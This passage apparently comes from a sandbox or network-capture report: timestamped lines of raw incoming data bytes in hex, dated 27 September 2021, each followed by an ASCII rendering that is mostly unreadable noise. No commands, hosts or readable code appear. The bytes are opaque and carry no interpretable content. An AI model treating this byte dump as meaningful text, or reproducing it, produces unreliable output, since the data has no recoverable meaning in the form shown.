e7 8a db d0 00 0b 14 46 02 6c 75 a9 af e1 26 60 f1 fe 3d 0d e7 1c 77 b4 f4 13 36 0c 6d 2d 80 91 99 13 17 32 25 82 cf 47 c9 0e 71 29 04 24 a8 fc 97 f8 01 f4 8f
                                      Data Ascii: zIFBt+-`ZK~ChDCoXC3&lkdJjC= 5>SyF4IaG*GW)iR~EDX\,bzpxdt?R*gSAzC:-m?<TbA'jFlu&`=w6m-2%Gq)$
                                      2021-09-27 11:24:29 UTC99INData Raw: 15 84 b1 c8 e7 9b aa 83 0b 6c 6c ed 28 e2 01 29 95 cf da d8 b8 1a 85 a0 80 f3 1a 04 5d 94 22 04 58 d3 ee 87 a9 5a 20 9b d5 3d e6 21 d5 16 cd c3 45 21 4f 95 13 44 1e 0c 51 74 f9 52 c2 e1 dd 99 33 6a 56 1b 56 0f 7a e6 c3 c0 a8 bf ff 27 c4 2a 37 0b 2f 04 7c 91 2b 87 13 52 1f 5a 93 f4 5a 67 35 4a 32 7d 7e 83 e0 39 f3 52 d4 ab 2a 51 8f a9 76 8f 08 35 b2 b5 7e f4 df 7a 4c 7e 4e fe 0f b1 5a e3 f8 34 d5 3c 58 e0 1d f7 34 30 ba 69 e6 21 96 c7 47 b1 05 7f f0 23 06 18 bc 5e b6 d4 08 fa f4 76 7e 58 63 38 e2 d5 41 38 82 40 06 73 83 8f c7 c7 d4 25 49 9e 24 6d 84 e0 a2 fe de ac 5e 5c a5 ec df 4c d5 79 39 cc c7 da 87 85 49 1f 81 34 8a b2 f6 10 12 9d 00 22 cc d2 d4 99 5e 3c 5d f0 c8 a8 d4 9f 69 bc b5 0d 22 b8 9a ac 2e 9f ee 24 de 01 97 31 b3 d5 df f1 43 ed 30 1d ff eb 5c
                                      Data Ascii: ll()]"XZ =!E!ODQtR3jVVz'*7/|+RZZg5J2}~9R*Qv5~zL~NZ4<X40i!G#^v~Xc8A8@s%I$m^\Ly9I4"^<]i".$1C0\
                                      2021-09-27 11:24:29 UTC100INData Raw: c2 85 08 14 48 28 29 ac f8 be e2 02 0d 3c d5 39 26 cd 05 09 78 e4 16 4b 66 e8 2f 84 93 f2 16 7f 18 22 82 fc 56 cc 75 86 28 04 31 c5 43 84 f9 07 d6 8a 63 4f 2a 2d 6a 10 ee a8 fc bd 3f 01 19 39 9d 97 d3 8c 49 1c 4b 6d e0 08 3c 11 74 85 bc 0a 5f 70 0d 7e 6c b7 fb 54 68 11 84 15 f4 42 52 06 19 d2 c4 7f 89 06 08 27 e1 7c c5 bb 18 04 4d fd 75 54 7b 01 bf df 7f d8 6a 81 5b bc a0 47 25 06 37 fe af 33 82 47 d7 db 68 20 19 d7 22 d2 41 40 db 91 c5 6b 98 35 f3 b3 54 cf a9 82 1b ca cd e2 cc da 32 6a 17 61 f3 5f 81 47 39 6b dc 00 1a cd 73 89 ba 06 cb 52 fe ea 9b 56 4d 55 e0 77 81 53 b8 ba 13 f8 5d 16 62 20 92 28 39 96 29 38 14 dc 4f 50 8e 53 05 b0 84 31 46 ee a9 ef 58 cb 4a 47 f6 76 42 e6 11 98 0c 92 29 f3 f5 72 4d d5 fa 09 4a ec 6d d1 f7 b3 79 b0 da c4 49 61 50 1d 45
                                      Data Ascii: H()<9&xKf/"Vu(1CcO*-j?9IKm<t_p~lThBR'|MuT{j[G%73Gh "A@k5T2ja_G9ksRVMUwS]b (9)8OPS1FXJGvB)rMJmyIaPE
                                      2021-09-27 11:24:29 UTC102INData Raw: 0a 7f 31 a0 b7 e4 bd 34 8d 01 26 c1 4f 66 2d 0d b5 5e f0 c6 b8 d3 e4 16 94 a4 06 3d a7 e7 b9 2a 8c 93 2b c5 ff 92 1b b7 cf 72 d7 53 ec 34 37 91 79 56 c1 5c 53 76 1e 06 2e 11 18 2f 7b c9 48 d8 1b f2 f7 5b d0 3f 8b d6 61 a1 ba ef da fa 6c 32 26 ad 00 25 e9 f8 d5 1e f9 ec 52 0b ad ee 15 b3 84 fe 7c 12 b4 52 a7 eb 3a 87 32 63 60 ce 05 fc 2b 8b ba 8b 45 7f 0a de d5 c9 76 88 dc cf 61 fd 17 ce ce b7 8e d0 4c c3 b8 4d 77 41 54 fb 67 ec 55 7b e3 14 6b 79 5e 31 d6 37 bf 7f b7 ab 01 40 cf 5f 4f 6e 2a 58 ab e2 38 b1 72 98 0e 13 c1 20 6d f0 c4 c1 8e bb 77 55 26 cb b6 a4 82 31 83 d2 3b 18 64 bb de 1a bf 3a fc 5e 83 2c cd 59 46 fe 35 0a 7e 19 55 1b 61 d5 83 c1 7a bb 46 32 83 95 1c 6c 9a 0b 0d ee 29 5e d8 1c 0b 8f 0f d4 19 17 7d a9 54 7c 8c ea 2c 9a 52 e9 fe 02 7c 27 b4
                                      Data Ascii: 14&Of-^=*+rS47yV\Sv./{H[?al2&%R|R:2c`+EvaLMwATgU{ky^17@_On*X8r mwU&1;d:^,YF5~UazF2l)^}T|,R|'
                                      2021-09-27 11:24:29 UTC103INData Raw: e0 05 d6 4b ae 8f 7e 10 b2 d2 3f fe 08 ad e4 70 51 48 47 ef 50 5c 89 7e 98 0c 98 eb fa e6 67 5b d7 fa 29 1e ed 41 de f5 d9 73 a9 24 c1 0a f6 4a 90 64 a6 6b cb 92 22 fc a4 9f 19 d3 b0 78 52 25 ab 99 ec 1e a3 22 c9 fc ec 63 d1 1c 48 8e a7 86 fb b0 6f 14 3c 83 80 82 cb 17 f5 c1 7f 3d e4 39 b1 e9 90 c0 85 1f 8a 6d ed 26 2b 3c a6 92 cf c1 cb b9 78 d2 a1 ac f5 0d 1e 4a ae d6 eb a3 37 0f 88 96 47 22 f1 de 2a 18 24 e6 39 b0 f8 dc 23 5e 9a 1a 4d 8f a4 7d 76 d8 4b e9 06 20 77 c8 5f 47 e5 44 13 68 e4 bd cc a9 bf 23 30 ec a1 37 70 35 13 66 fa af 8c 3b 99 04 48 86 83 d9 74 31 5c b6 0f 2d 96 e2 48 f1 45 de 97 e0 7d a7 30 76 f4 12 22 aa de d1 dc ce 71 51 67 59 ee 0f a5 2e 3d a9 53 fe 3c 49 ae db f6 30 2a 35 39 f6 20 97 ce 48 b9 cc 07 e7 28 11 0d d7 c2 b7 cc 14 39 eb 91
                                      Data Ascii: K~?pQHGP\~g[)As$Jdk"xR%"cHo<=9m&+<xJ7G"*$9#^M}vK w_GDh#07p5f;Ht1\-HE}0v"qQgY.=S<I0*59 H(9
                                      2021-09-27 11:24:29 UTC104INData Raw: 33 13 56 b8 1a 28 62 64 1c 7e de 63 a4 37 da 64 48 8d 90 03 7a 8a 78 14 fe 21 45 fd 7b 08 a3 0e c5 17 46 34 54 ab 89 8c f4 2c 94 52 e9 f0 0b 88 d8 99 8d 85 40 bb 6c 64 8c c3 03 b6 c0 38 09 06 ad ff ce eb 19 47 3d bb 49 0e e7 3a 6a 53 60 81 e6 04 98 54 c0 0e 8d 2e 6b c4 f4 73 de 81 11 12 1f 42 02 15 50 a9 83 e5 1d 69 f6 d3 21 de e0 37 1a 57 f7 38 d3 70 e8 07 1f 99 e3 19 68 21 23 82 f8 47 c9 0e a2 69 5f 1d 3b 87 85 f3 b8 ff 99 4d c7 bf 2f 60 01 a1 78 42 bc 2c 2f 46 2d ba 9d cc 9c 44 21 2b 62 eb fc 9c 43 1b 47 a2 1a 3b 0b 69 1e a5 9e 58 50 6a 4b e0 0d 97 28 36 21 21 fa 60 77 80 0e 78 e0 eb 7d c5 65 2f 85 2d 97 1f ee 53 42 f4 d5 7e fd 6f 83 0b 24 b2 46 34 14 0c 34 96 26 85 16 09 f0 51 1f 06 dc d6 c5 66 63 cb e8 c5 61 4c 39 ff 84 69 dc a1 88 26 c4 dd 34 f4 f6
                                      Data Ascii: 3V(bd~c7dHzx!E{F4T,R@ld8G=I:jS`T.ksBPi!7W8ph!#Gi_;M/`xB,/F-D!+bCG;iXPjK(6!!`wx}e/-SB~o$F44&QfcaL9i&4
                                      2021-09-27 11:24:29 UTC105INData Raw: 6b e0 ce 1c 89 b0 78 d6 e6 d3 4e 74 57 93 3d a0 34 c7 b7 66 c7 36 32 b1 d2 e9 3f ce b9 3e fa 29 89 db 05 6b 2d a8 84 3e 0a 01 94 5e af dc 17 b4 1c 89 53 5a 98 3a f9 cd 5f 95 ba 7a 07 77 8f ed d0 10 fc aa 54 8c 3d 76 89 f3 d1 f1 cc 52 5b 76 b5 e3 01 7a 12 50 b2 c4 d4 de 96 f8 46 0a 92 38 8c bc ee d8 c4 8d 2d 2d c5 c9 cf 4d 0d a7 5e f0 c6 bd cf 94 b6 87 ac 0c 33 ba eb af d4 9c b9 25 da 7a 8e 36 ac c9 1c b7 12 b2 ce e8 6e e7 47 d2 7c ca 65 16 16 c6 08 5b 83 50 d4 59 d4 08 e1 e0 53 de 23 6a ce b3 a8 9e ef 0e 8d 7d 28 35 a1 16 1c 78 e5 ce ea ee d8 34 aa bc e9 2e 85 81 f1 69 1a a5 45 b0 ef 3a 87 32 42 7a a6 03 fd 3a 87 a5 76 3f 48 01 d9 c6 e6 b4 77 23 36 57 74 1d ce d5 a9 8f 41 e4 ef b3 44 60 7d cc ff 67 f7 58 78 e1 e2 6a 44 4a 2c a4 c7 bf 53 bc ab 72 7f c4 89
                                      Data Ascii: kxNtW=4f62?>)k->^SZ:_zwT=vR[vzPF8--M^3%z6nG|e[PYS#j}(5x4.iE:2Bz:v?Hw#6WtAD`}gXxjDJ,Sr
                                      2021-09-27 11:24:29 UTC107INData Raw: c9 57 79 51 0c d3 7e d8 62 83 0b c7 a8 46 25 03 0c 0c ac 33 ac 16 09 f0 48 17 19 c6 3e cf 61 73 e3 96 d2 9f 47 06 f8 83 6e cf ae 9e c9 cd e8 c8 e2 d1 32 67 07 b7 c3 73 83 66 17 46 37 2a 58 d7 72 83 62 3b 9b 57 fc fd 9a 7e 47 57 fd 6d 93 e8 ea 36 19 de bd 12 62 26 ba 96 14 96 88 9d 33 d3 55 54 a4 52 14 80 ad 31 36 09 a9 f2 bf cb 4a 56 f3 55 42 de 6c 99 0c 92 f4 e2 f1 7c 50 38 ff 1d f1 ee 16 f9 f6 a2 79 ae 4b 96 64 6b 42 9c 71 a0 61 dc 96 33 e9 bf 8d f2 2c 9d 40 51 73 5d 9c ec 1c c0 a0 df ef e2 59 4d 19 57 84 46 89 c4 9d 6d 7e 36 9a 7e 87 e5 74 d1 1e 7d 39 8d 9b e7 e8 9a a0 a7 3f b8 6c ed 51 a2 16 3a 9a c4 d2 ce a3 17 6a a5 b0 01 13 39 57 8a d6 fe a7 2c 7c a2 ba 5f 21 80 cd 38 1c 20 e8 11 c5 df be 20 72 9f 0e 28 c8 0c 7d 72 bd ac fa 02 2a 79 dc 53 52 1b 54
                                      Data Ascii: WyQ~bF%3H>asGn2gsfF7*Xrb;W~GWm6b&3UTR16JVUBl|P8yKdkBqa3,@Qs]YMWFm~6~t}9?lQ:j9W,|_!8 r(}r*ySRT
                                      2021-09-27 11:24:29 UTC108INData Raw: 03 7d bc 88 38 72 86 d9 d1 a6 a5 9d c8 dd 61 c4 15 ce ce 89 ce bf e5 c9 b2 99 78 70 6f ca 67 fd 59 69 e4 e0 42 6d 42 33 a7 e7 be 79 99 a8 7a 60 8f 43 4b 46 b0 5a ab e8 2e ab 1d 31 fd 12 cb 3f 8c e2 c2 c1 8f bd 68 42 c2 ca 9a b2 9b 7a 88 d3 bf 1d 72 93 ad 18 bf 21 c2 b5 e8 85 cb 53 4e 9a 0a 18 78 1d 6c 32 7e da 77 ed 5a a5 3f 6e 8c 94 18 40 a9 70 14 e5 0f 58 8b a2 08 8f 01 ea f5 7c d4 af 7c 52 93 fa 35 b4 63 f8 f8 17 5b be c6 3c 90 53 b9 67 77 eb 38 26 48 c7 18 0c 25 aa bc 53 16 e6 bc 3f 4f 5e 3e e2 12 32 53 60 8b 69 b7 9a 45 dc db e7 10 43 f4 e3 8d d5 a0 14 22 e1 46 05 05 ac d3 88 e6 0a 66 de 20 3d 20 e7 33 3c 7c f5 19 5f cc eb 2f 8a 45 ef 3b 33 02 23 88 d0 7f c9 0e a8 f7 04 1d 92 87 85 f3 df fa 9f 49 61 ba 40 3d 1a c3 18 fe b1 56 20 e6 2f be bf 27 93 26
                                      Data Ascii: }8raxpogYiBmB3yz`CKFZ.1?hBzr!SNxl2~wZ?n@pX||R5c[<Sgw8&H%S?O^>2S`iEC"Ff = 3<|_/E;3#Ia@=V /'&
                                      2021-09-27 11:24:29 UTC109INData Raw: d7 b4 11 6a a7 b8 d7 96 17 59 ac c1 77 a0 2c f1 88 a9 51 31 84 c6 3a 11 82 e8 1b c9 df 51 2e 4a 84 1b de cf 0d 7d 77 c1 47 eb 12 36 71 50 51 46 0c 6d 98 7f e6 cc e4 b9 af 31 b7 e8 24 24 7f 29 9f 54 84 06 8c 31 43 09 5a 95 9c f1 71 35 40 42 26 35 80 e0 39 8b 56 de 93 e4 43 86 b6 14 fe 09 3d 3c 06 6f 0a 43 50 4c 74 5c fd 19 b0 3d d2 af 69 bb 98 30 a0 d0 e7 33 21 b1 9c 41 26 22 5f 5d 23 ec 57 7b 20 0a 0d 8c 58 a1 db 57 73 6e b7 7f 4e 9c 3f eb b1 cf 7c 92 41 07 7f ad a3 cc 11 f6 86 fc 9c 2e 74 82 ca 61 ec df a6 49 50 92 bb 08 64 ce 7b 56 5e d4 d4 8f ed 52 00 90 3b 02 1a 30 d1 e0 9b d7 af ed c1 d1 9a 36 21 4d f7 da bf c6 9d a1 bc b3 0d 22 b8 e5 b4 3c 8c 98 2a ce 0a 1d 80 84 da 08 d9 58 fd 3d 99 26 74 69 c1 74 cb 67 12 34 6e 08 77 86 7c d8 4e d1 28 57 f1 5b cb
                                      Data Ascii: jYw,Q1:Q.J}wG6qPQFm1$$)T1CZq5@B&59VC=<oCPLt\=i03!A&"_]#W{ XWsnN?|A.taIPd{V^R;06!M"<*X=&titg4nw|N(W[
                                      2021-09-27 11:24:29 UTC111INData Raw: c4 7b ff cd 25 5a c1 18 80 9b e9 00 01 2a 29 87 f8 41 c3 26 9a 29 04 3f 74 87 83 d3 00 ec 98 65 65 bd 37 6a 77 46 12 2e b3 2d 07 e7 2f ba 97 d3 02 b3 4b 5e 77 ea d4 3f 5a 2b 45 bd b0 59 61 09 fe a4 b6 ea 7a 61 44 ff 1e e1 6a 94 2c 20 d8 ec 64 80 04 52 51 92 ee c5 bf 3a 90 46 e9 57 5a 7c 51 c2 c5 f3 df 6e 83 0a d4 b4 57 23 14 37 31 ab 33 82 b4 18 f6 54 03 0d ff 8b c4 4a 62 cb 80 c5 61 4c 21 fd ef 0e cf a9 89 58 0d c4 ca ff c9 35 4b 2f 58 c5 30 43 4d 15 67 fc 39 23 cd 79 90 62 19 f0 51 c0 c2 94 7b 4d 53 f4 fa bc 53 ea 37 07 e2 49 3e c1 20 92 22 3c 0d 82 e0 1e fa c9 50 8e 58 0b a1 ae 5e 38 08 a9 f8 75 0c 94 51 f4 41 33 dd d7 98 0d be f8 e2 f2 16 60 c6 fe 30 8f bb 6d d1 fd 7e 75 a2 fa d0 40 43 7f 90 6e a6 61 dd be 2d e8 a0 86 06 05 89 54 58 51 60 98 ea 30 af
                                      Data Ascii: {%Z*)A&)?tee7jwF.-/K^w?Z+EYazaDj, dRQ:FWZ|QnW#713TJbaL!X5K/X0CMg9#ybQ{MSS7I> "<PX^8uQA3`0m~u@Cna-TXQ`0
                                      2021-09-27 11:24:29 UTC112INData Raw: cc ae ca 98 b6 82 b5 0b 20 c9 c3 be 2a 99 fa ff dd 01 99 ed b4 15 1e 03 41 fd 23 1d ba c0 47 c8 65 c0 76 18 63 f2 0b 77 8c 73 d8 4a 1f 18 37 e0 51 d9 e1 42 d7 88 cf 62 f9 d8 87 4a 2b 27 a9 1c 25 27 f8 d5 12 c7 da 3f a2 ab 81 67 ac 9e e7 d8 03 af 43 6e eb ce 97 14 50 73 84 c9 ec 22 a7 b1 88 3e 4f 1d cf d8 28 13 9e 06 da 5b 74 19 f6 7d a1 94 bf f4 ca a9 4b f2 4a 57 d5 8e fc 53 6e fa fb 62 8d 94 20 a2 28 b7 6e bf bf ac fa d1 4f 63 af b1 5a a1 e0 3f a3 c5 e7 1d 1d da 33 67 35 d3 c8 11 0a 5a 48 d0 c2 8b bb 58 9c 9e d8 10 09 63 9a 56 14 a7 e6 70 59 fc ad 24 58 4c eb 25 08 70 c1 92 0e 75 f2 26 c1 56 ad 46 4f e2 5e 1e 68 93 61 1a fe 22 4b fe 5f 1f e0 f1 c3 01 7e bb bf 55 76 99 e9 32 9e 54 97 32 1f 76 d3 a4 81 83 5d a2 63 af 92 b3 d3 49 c1 12 23 35 a9 c7 7e 04 f6
                                      Data Ascii: *A#GevcwsJ7QBbJ+'%'?gCnPs">O([t}KJWSnb (nOcZ?3g5ZHXcVpY$XL%pu&VFO^ha"K_~Uv2T2v]cI#5~
                                      2021-09-27 11:24:29 UTC113INData Raw: 03 44 46 e6 c8 bb 1f 99 f4 e2 fe 7c 61 38 ff 1d f1 eb 02 2d f6 a2 7b b9 2c aa b5 69 48 9a 71 97 61 d3 96 33 e6 bf b1 f2 2c 9d 5f 5b 52 a9 4e 7d 09 ab 22 ed fc e3 63 d1 13 48 9e a7 86 fb 95 7c 65 2a c2 bc 84 c9 6c e6 db 6c 32 8b a2 b8 f6 b3 54 86 48 90 1f ed 20 fd 12 29 97 d0 e1 ce ac 17 6a aa b6 01 13 39 51 92 61 fa a7 2c ea 9a b1 5f 31 81 cf 0c e6 21 d5 13 f1 dd 5f 09 4d 9b 0c 42 eb 12 3e 88 d3 7b f2 0b 37 b0 c1 5f 12 08 4e 3f 6e ed d9 e8 56 be 0b 2b d5 3c 2f 1f c6 04 7c 93 19 a7 28 98 1b 4b 9e 98 c9 9b 34 6c 59 09 6e 7d e1 33 f9 55 db fc 2f 52 8f a3 6b e5 0b 3f b2 a0 73 c3 f1 85 4d 58 56 ed 17 b6 e2 52 bb 7b cb 7e 21 ab da e7 3f 2f aa ec f7 0c 86 cb cf 18 d0 d9 cc 28 1e c4 46 6f b3 cb 1b b6 e9 88 6e 45 82 2c 0f d3 6f 4a 9a cf b1 64 81 8f db 02 f7 ae 5a
                                      Data Ascii: DF|a8-{,iHqa3,_[RN}"cH|e*ll2TH )j9Qa,_1!_MB>{7_N?nV+</|(K4lYn}3U/Rk?sMXVR{~!?/(FonE,oJdZ
                                      2021-09-27 11:24:29 UTC114INData Raw: c1 f5 cb 39 7f 3b b7 c3 73 90 4e 1c 75 02 20 35 dc 77 ab 71 10 e1 5f cb cf 89 75 4d 44 e9 68 8c ad eb 1a 18 85 5d 14 62 26 81 20 0b ae 91 eb 14 c3 5e 4f 9f ac 06 9c ba 32 f6 1f 7f 63 4f 11 5d 91 68 6d 46 e6 d6 94 13 80 e7 f8 f5 72 50 db 00 30 cc e0 7c db e8 92 3d ab d9 3a 9a 75 5b 9b 6e bd 79 c7 8d dc ec 8c 8b 7f 2d b3 54 5e 48 b8 87 f0 09 a4 3d ce e4 f6 9d c1 34 5a 83 36 7d d6 99 6b 79 01 bc 9f 8f da 67 f9 d1 74 26 94 4d b2 c5 89 a9 8e 73 4d fd fa f8 ea c2 b7 bb cf cb dc ab 08 5b b2 a7 ff 03 1e 46 b6 28 fb 8b 20 e0 8f a2 30 d9 8b d0 2d 07 3d ea 1e da c1 4b 3e 53 6e 0d 7f eb 7e 7d 74 d2 51 e9 07 3f 68 df 4b 56 0a 4e 20 69 18 c7 ee b9 bc 2e 3f 12 33 23 61 3b 2d 6b 94 06 86 24 84 08 51 95 96 d2 7a 15 be 49 22 14 88 f8 e5 fc 4d c9 45 6e 86 8c 27 c3 ca cf cf
                                      Data Ascii: 9;sNu 5wq_uMDh]b& ^O2cO]hmFrP0|=:u[ny-T^H=4Z6}kygt&MsM[F( 0-=K>Sn~}tQ?hKVN i.?3#a;-k$QzI"MEn'
                                      2021-09-27 11:24:29 UTC115INData Raw: 25 cf 5f 4f 50 b8 53 a9 93 6d aa 1d 35 26 26 ca 3f 75 ea c0 ba dc bc 68 46 0e c7 a2 5e 80 4a 8d d1 40 59 73 93 43 0e b7 39 fb 42 c4 b0 cc 59 46 e3 3c 1d 05 5f 45 1d 7a d8 7f bb 15 a6 44 4d f0 d3 1d 68 9d 78 3e f0 22 49 f5 85 18 8a 1e 3c 00 54 de af 42 48 27 fa 3f 9c 4e eb fd 1d 67 dc ab 70 93 7f a1 6e 77 ff 9a 26 48 c5 17 dd 50 ee c6 74 13 f9 b1 04 be 5a 2f e1 25 1f ad 61 ad 00 0c b2 5a dc 16 a3 35 7a c6 fb 73 de 81 1d 09 03 98 12 d5 23 83 af e7 0b 6e ef c7 3c 20 f0 1e 04 82 f4 3f 3a 7c ef 13 89 64 1c ec 19 11 26 82 e9 42 d4 f0 a3 05 13 37 d1 c2 84 f9 05 f2 e3 23 66 bd 2b 62 0c c0 3a 17 b2 2d 0d f9 3c bf 97 c2 92 3c b5 4a 41 fb d6 45 06 1a 4d b9 08 22 27 08 11 a0 6c f1 49 79 44 ff 09 f0 5b a8 2f 0c d7 d2 78 9a 17 5d 5c fd 78 d3 41 31 b0 4c ea 6c 53 79 40
                                      Data Ascii: %_OPSm5&&?uhF^J@YsC9BYF<_EzDMhx>"I<TBH'?Ngpnw&HPtZ/%aZ5zs#n< ?:|d&B7#f+b:-<<JAEM"'lIyD[/x]\xA1LlSy@
                                      2021-09-27 11:24:29 UTC116INData Raw: 7a 11 54 3a 6e ec f7 f5 b7 b0 34 2a c4 2a 38 68 c1 04 50 82 04 f7 72 92 1b 5e 1b 30 c3 b3 22 9a 5f d8 8c aa e0 33 fe 49 c7 80 f2 50 9e a4 63 0a 19 18 b1 a9 6b d1 ce 6a 41 6b 51 10 1f 8d 03 c5 b9 7a d2 2f 37 31 56 dd 34 30 b9 1a e1 ad 91 c3 41 ae c0 50 6a 26 10 03 99 d2 81 d4 08 a4 40 99 78 5a b5 94 f1 d2 49 6b 7f 40 06 7d ad 4d cf 11 f6 32 54 93 3d 73 89 f3 d4 f0 21 ad 76 53 82 1c f4 9b 3b 67 30 d5 d9 d4 94 f3 46 08 7f 31 a0 81 f7 cd 2e a4 80 20 c6 c7 c6 16 22 2c 5c f1 df a2 da 87 a9 85 a2 14 b8 9a e5 bf 2a 97 37 25 d3 15 87 20 ba e5 a1 d9 52 e6 2f 00 82 f5 56 d0 79 d5 64 e0 0d 14 7c 63 56 fa c9 42 c6 28 f5 f1 5b cb 11 88 cc 9f a6 8f 75 df 81 62 32 35 ae 07 0a 66 fc 77 05 e8 e3 35 8a bc ee 1f a6 3c fc 7d 0a ad 47 b3 e9 cf 92 36 c0 60 b5 0d eb a6 88 b8 88
                                      Data Ascii: zT:n4**8hPr^0"_3IPckjAkQz/71V40APj&@xZIk@}M2T=s!vS;g0F1. ",\*7% R/Vyd|cVB([ub25fw5<}G6`
                                      2021-09-27 11:24:29 UTC118INData Raw: d1 97 2c d7 42 7a 3c d9 37 50 1f 7c 64 0d 73 61 1a 21 a7 b6 44 52 6a 41 03 18 f5 53 40 3d 25 ea 6f 75 80 04 58 4d e9 62 cc 41 31 b0 44 f4 6e 52 f7 e6 f6 b2 61 d2 7d 86 0b d6 b7 51 db 03 33 3f b6 20 81 16 18 f5 59 e9 18 fb 2e c6 59 6c f9 82 c0 61 57 2f e0 65 64 e3 ac 9e 3a d7 d7 cf f5 cb 37 7b e1 48 ee 5a aa 88 09 7e d1 28 32 c8 6b 7d 67 3d e8 26 6d ea 9a 74 46 4c f1 72 bb 42 ef 28 ed f7 71 1e 6b 37 44 25 0b 9f 91 e5 14 c3 50 4c 70 53 2b b8 b8 35 f6 99 a5 ef 4b ce 4a 56 e0 5b b8 e7 fb 8d 0b ba e3 f6 f5 65 53 4a d5 31 e0 ed 02 05 f5 a2 77 8e 3a d6 60 6b 59 95 78 52 73 f4 95 35 fe a5 80 1d 28 ae 5e a6 5a 92 9a c7 1f 97 6d 20 10 17 64 af ca 57 84 53 ad d7 82 5d 6a 32 bd 80 86 c9 91 f9 c0 6e 3b 05 04 b0 67 2d 7c 90 be 8c ba 60 09 fd 14 3b 9b cd cc df 29 a0 53
                                      Data Ascii: ,Bz<7P|dsa!DRjAS@=%ouXMbA1DnRa}Q3? Y.YlaW/ed:7{HZ~(2k}g=&mtFLrB(qk7D%PLpS+5KJV[eSJ1w:`kYxRs5(^Zm dWS]j2n;g-|`;)S
                                      2021-09-27 11:24:29 UTC119INData Raw: f1 5a 63 28 b5 db 8b b4 be 5b d8 81 68 27 0e 6a 15 0d 76 ed 58 13 ef f4 3c b1 8f ff 3d ba 89 61 45 12 a5 55 1a e9 e6 92 0a 55 4a 16 0b fd 21 9b 90 4b 3d 64 0d c9 5c a1 a4 89 dd da 6a 76 36 d8 d2 2d ab bf e5 c2 1a 56 4b 41 53 e9 4f 5e 53 64 f8 fe 42 91 41 33 ab 2f 33 78 b3 a8 7b 74 da 4b 63 e5 b0 5a a1 c0 3f ab 1d 3b 1d 1f c2 2b 57 20 c1 c1 99 aa e5 45 d8 ca 9b a0 a3 5b ae c5 2d 90 4d 93 47 19 1d 21 c9 52 f8 91 e5 fa 4c e1 27 0d 50 da 47 1d 78 cd f0 c7 56 a7 45 5a af 85 3e 7e 8e fc 2b ef 29 5b 52 94 2b 9b 11 d6 29 db d4 a9 5e 62 bb 3e 3c 9c 54 ee 75 1a 76 d9 b4 9a 86 47 9b cf 75 84 d6 0f 59 c1 14 01 3e a3 d6 71 3f bd b9 17 b1 72 10 e6 3a 10 3c f8 81 06 0e 89 49 a2 17 a6 35 70 d2 e8 f9 cd ad 13 11 3c 56 07 03 a8 bb a2 f3 da e3 f6 d4 38 08 f5 1b 18 76 dd 0f
                                      Data Ascii: Zc([h'jvX<=aEUUJ!K=d\jv6-VKASO^SdBA3/3x{tKcZ?;+W E[-MG!RL'PGxVEZ>~+)[R+)^b><TuvGuY>q?r:<I5p<V8v
                                      2021-09-27 11:24:29 UTC120INData Raw: e6 32 86 38 df e9 fe 4b 28 1a 57 8e 71 6e d5 99 67 7e 2e 96 a8 ae cd 6c ff d6 f2 3e 8b b3 b2 fd 8e be af c7 9b 6c e7 0a d7 11 3a 96 d9 e3 35 a5 17 71 89 45 fd 12 1f 71 1e d6 fa ad 00 ec 98 a6 4b 08 0d d3 2b 1e 36 74 12 da d0 41 35 4a 84 24 f0 e0 0d 77 5e 4e 57 fa 08 33 7c dd 5c 42 33 6d 3b 7f e0 d0 4f af bf 27 26 d0 2f 21 58 9c 05 7c 9f 2e a4 3e 93 1d 4c bd 76 d8 65 3f 6c 04 1f 1d 95 c8 b4 fc 44 d8 85 72 57 8f a9 75 e0 0c 20 9a 12 78 dc c4 6f 64 88 59 ee 18 b9 b9 c4 a8 7f d5 2d 11 b1 f9 e0 1c 67 ba 12 f0 82 87 e0 56 87 fd 55 7b 27 a4 03 bf 4a aa c0 20 06 e2 88 75 66 01 39 f1 d8 6b 4c 90 41 00 64 9e 82 e8 39 16 ac 4b 94 14 98 77 1d 26 30 d1 be 7f a4 ac cd 09 64 df 17 6e c6 d4 de 59 8d af 1f 81 36 9f be f7 d5 2b 96 29 75 c4 c1 d7 b3 0b 2e 5c f6 a3 d6 cb 8b
                                      Data Ascii: 28K(Wqng~.l>l:5qEqK+6tA5J$w^NW3|\B3m;O'&/!X|.>Lve?lDrWu xodY-gVU{'J uf9kLAd9Kw&0dnY6+)u.\
                                      2021-09-27 11:24:29 UTC121INData Raw: 7e 1e df 5a 17 bb 5a 21 fd 29 01 53 71 96 19 1b 66 44 fa 26 b7 38 04 3f e2 8d d9 bb 7c d8 16 42 0f 6c 52 a9 af e1 12 0d 24 d6 39 2a 8e e5 19 7c f3 00 3e 60 c9 3c 97 9b f2 04 1b 16 dd 83 d4 66 d8 07 b3 23 13 e3 c5 6b 87 f9 0b 9f 1f 64 67 b7 37 05 92 c2 12 28 dc a4 06 e7 25 a9 93 cc 82 35 5c 4b 7c fd cb 2d bf 1a 61 a3 1b 50 70 03 7e 48 b4 fb 58 05 c6 fe 18 ff 5a 39 a6 21 d2 ce 1a 09 05 58 56 e0 62 d1 ac 27 9c 5e ea 60 73 87 50 e8 de 6f c8 6d ec 21 c5 b2 40 3a 24 0c 2b ae 22 93 09 03 0e 41 3b 03 c6 2d ec 61 6d e3 97 ed 45 46 2a f0 b3 54 cf a9 82 0e 3e c4 ca f5 c5 39 73 08 49 d3 48 9d b3 14 41 d2 2a 30 d8 6e 90 71 11 f0 42 cb e6 64 7f 61 5c da a5 bb 53 ea 29 1e e5 4a 16 73 37 8d 0f ea 97 ae ea 05 d8 4c 86 9d 58 18 98 ba 26 ff 19 be ea a6 ca 66 4e 96 fc 46 e6
                                      Data Ascii: ~ZZ!)SqfD&8?|BlR$9*|>`<f#kdg7(%5\K|-aPp~HXZ9!XVb'^`sPom!@:$+"A;-amEF*T>9sIHA*0nqBda\S)Js7LX&fNF
